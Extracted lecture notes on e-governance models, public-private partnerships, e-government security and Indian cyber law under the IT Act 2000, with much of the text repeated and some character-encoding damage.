In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
